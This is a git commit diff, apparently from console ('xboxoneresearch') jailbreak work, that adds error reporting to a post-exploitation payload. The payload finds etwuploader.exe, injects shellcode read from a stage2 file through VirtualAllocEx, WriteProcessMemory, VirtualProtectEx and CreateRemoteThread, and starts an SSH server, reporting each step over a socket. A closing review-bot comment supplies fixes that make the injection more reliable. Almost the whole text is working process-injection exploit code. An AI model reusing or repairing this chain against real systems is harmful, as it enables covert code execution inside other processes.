
Commit aaedf1c

Merge pull request #21 from xboxoneresearch/feat/post_exploit_errorhandling
feat: increase error details in post_exploit stage
2 parents 4b89a33 + 6d3a735 commit aaedf1c


1 file changed

+77
-16
lines changed


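--- a/collat_payload/post_exploit.c
+++ b/collat_payload/post_exploit.c
@@ -65,9 +65,9 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
 
 if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
 {
-sprintf(cur_msg, "EnumProcessesFailed\n");
+sprintf(cur_msg, "EnumProcessesFailed, error: 0x%x\n", GetLastError());
 send(sock, cur_msg, strlen(cur_msg), 0);
-return 1;
+exit(0);
 }
 
 
@@ -99,11 +99,11 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
 sizeof(szProcessName) / sizeof(CHAR));
 }
 
-sprintf(cur_msg, "Process: %s\n", szProcessName);
-send(sock, cur_msg, strlen(cur_msg), 0);
+//sprintf(cur_msg, "Process: %s\n", szProcessName);
+//send(sock, cur_msg, strlen(cur_msg), 0);
 
 if (strcmp(szProcessName, "etwuploader.exe") == 0) {
-sprintf(cur_msg, "Found etwuploader.exe\n");
+sprintf(cur_msg, "Found etwuploader.exe (PID: %u, HANDLE: %p)\n", pid, hProcess);
 send(sock, cur_msg, strlen(cur_msg), 0);
 
 target_process = hProcess;
@@ -130,20 +130,39 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
 
 HANDLE filehandle = CreateFileA(stage2_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, 0);
 if (filehandle == INVALID_HANDLE_VALUE) {
-sprintf(cur_msg, "Failed to load stage2\n");
+sprintf(cur_msg, "Failed to load stage2, error: 0x%x\n", GetLastError());
 send(sock, cur_msg, strlen(cur_msg), 0);
 exit(0);
-return;
 }
 
 DWORD file_size = GetFileSize(filehandle, NULL);
+if (file_size <= 0) {
+sprintf(cur_msg, "GetFileSize failed, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+}
 
-sprintf(cur_msg, "Allocating memory for the shellcode in the remote process\n");
+sprintf(cur_msg, "Allocating memory (%u bytes) for the shellcode in the remote process\n", file_size);
 send(sock, cur_msg, strlen(cur_msg), 0);
 
 LPVOID shellcode_addr = VirtualAllocEx(target_process, 0, file_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+if (shellcode_addr == NULL) {
+sprintf(cur_msg, "Failed to allocate memory for shellcode in remote process, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 HANDLE h_heap = GetProcessHeap();
+if (h_heap == INVALID_HANDLE_VALUE || h_heap == NULL) {
+sprintf(cur_msg, "Failed to get process heap, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 BYTE* shellcode_data = HeapAlloc(h_heap, 0, file_size);
+if (shellcode_data == INVALID_HANDLE_VALUE || shellcode_data == NULL) {
+sprintf(cur_msg, "Failed to heap allocate, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
+
 
 DWORD remaining = file_size;
 DWORD bytes_read = 0;
@@ -157,37 +176,79 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
 
 sprintf(cur_msg, "Writing shellcode\n");
 send(sock, cur_msg, strlen(cur_msg), 0);
-WriteProcessMemory(target_process, shellcode_addr, shellcode_data, file_size, NULL);
+BOOL bSuccess = WriteProcessMemory(target_process, shellcode_addr, shellcode_data, file_size, NULL);
+if (!bSuccess) {
+sprintf(cur_msg, "Failed WriteProcessMemory, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 
 sprintf(cur_msg, "VirtualProtecting shellcode\n");
 send(sock, cur_msg, strlen(cur_msg), 0);
 DWORD old_protection = 0;
-VirtualProtectEx(target_process, shellcode_addr, file_size, PAGE_EXECUTE_READ, &old_protection);
+bSuccess = VirtualProtectEx(target_process, shellcode_addr, file_size, PAGE_EXECUTE_READ, &old_protection);
+if (!bSuccess) {
+sprintf(cur_msg, "Failed VirtualProtect, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 
+char srv_name[0x200] = { 0 };
+DWORD result = ExpandEnvironmentStringsA("%LOCALAPPDATA%\\..\\LocalState\\srv.exe", srv_name, sizeof(srv_name));
+if (result == 0) {
+sprintf(cur_msg, "Failed ExpandEnvironmentStringsA, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 
-sprintf(cur_msg, "Creating remote thread\n");
-send(sock, cur_msg, strlen(cur_msg), 0);
 
-char srv_name[0x200] = { 0 };
-ExpandEnvironmentStringsA("%LOCALAPPDATA%\\..\\LocalState\\srv.exe", srv_name, sizeof(srv_name));
 sprintf(cur_msg, "New process to be started: %s\n", srv_name);
 send(sock, cur_msg, strlen(cur_msg), 0);
 
 LPVOID image_name = VirtualAllocEx(target_process, 0, sizeof(srv_name), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-WriteProcessMemory(target_process, image_name, srv_name, sizeof(srv_name), NULL);
+if (image_name == NULL) {
+sprintf(cur_msg, "Failed VirtualAllocEx, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
+
+bSuccess = WriteProcessMemory(target_process, image_name, srv_name, sizeof(srv_name), NULL);
+if (!bSuccess) {
+sprintf(cur_msg, "Failed WriteProcessMemory, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 
 SHELLCODE_ARGS args = {
 image_name,
 NULL,
 };
 
 LPVOID args_addr = VirtualAllocEx(target_process, 0, sizeof(args), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+if (args_addr == NULL) {
+sprintf(cur_msg, "Failed VirtualAllocEx, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 sprintf(cur_msg, "Args will be allocated at: %p\n", args_addr);
 send(sock, cur_msg, strlen(cur_msg), 0);
 
-WriteProcessMemory(target_process, args_addr, &args, sizeof(args), NULL);
+bSuccess = WriteProcessMemory(target_process, args_addr, &args, sizeof(args), NULL);
+if (!bSuccess) {
+sprintf(cur_msg, "Failed WriteProcessMemory, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
+
+sprintf(cur_msg, "Creating remote thread\n");
+send(sock, cur_msg, strlen(cur_msg), 0);
 
 HANDLE thread_handle = CreateRemoteThread(target_process, NULL, 0, shellcode_addr, args_addr, 0, NULL);
+if (thread_handle == INVALID_HANDLE_VALUE) {
+sprintf(cur_msg, "Failed CreateRemoteThread, error: 0x%x\n", GetLastError());
+send(sock, cur_msg, strlen(cur_msg), 0);
+exit(0);
+}
 //ResumeThread(thread_handle);
 sprintf(cur_msg, "Remote thread HANDLE: %p\n", thread_handle);
 send(sock, cur_msg, strlen(cur_msg), 0);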
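Review bot: The new CreateRemoteThread guard in the last hunk compares against INVALID_HANDLE_VALUE, but CreateRemoteThread signals failure by returning NULL, so a failed call slips past the check and the NULL handle is then reported as the "Remote thread HANDLE"; the test should read `if (thread_handle == NULL) {`. The GetFileSize guard in the third hunk has the same shape of problem: file_size is a DWORD, so `file_size <= 0` is only true for 0, the documented failure value INVALID_FILE_SIZE is never matched, and unlike every other new check this branch sends its message and then falls through into VirtualAllocEx instead of calling exit(0); `if (file_size == 0 || file_size == INVALID_FILE_SIZE) {` followed by `exit(0);` after the send would bring it in line with the surrounding checks. The `h_heap == INVALID_HANDLE_VALUE` and `shellcode_data == INVALID_HANDLE_VALUE` halves of the heap checks are harmless but misleading, since GetProcessHeap and HeapAlloc only ever report failure as NULL. post_exploit_spawn_ssh_server begins before the first hunk and continues after the last.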
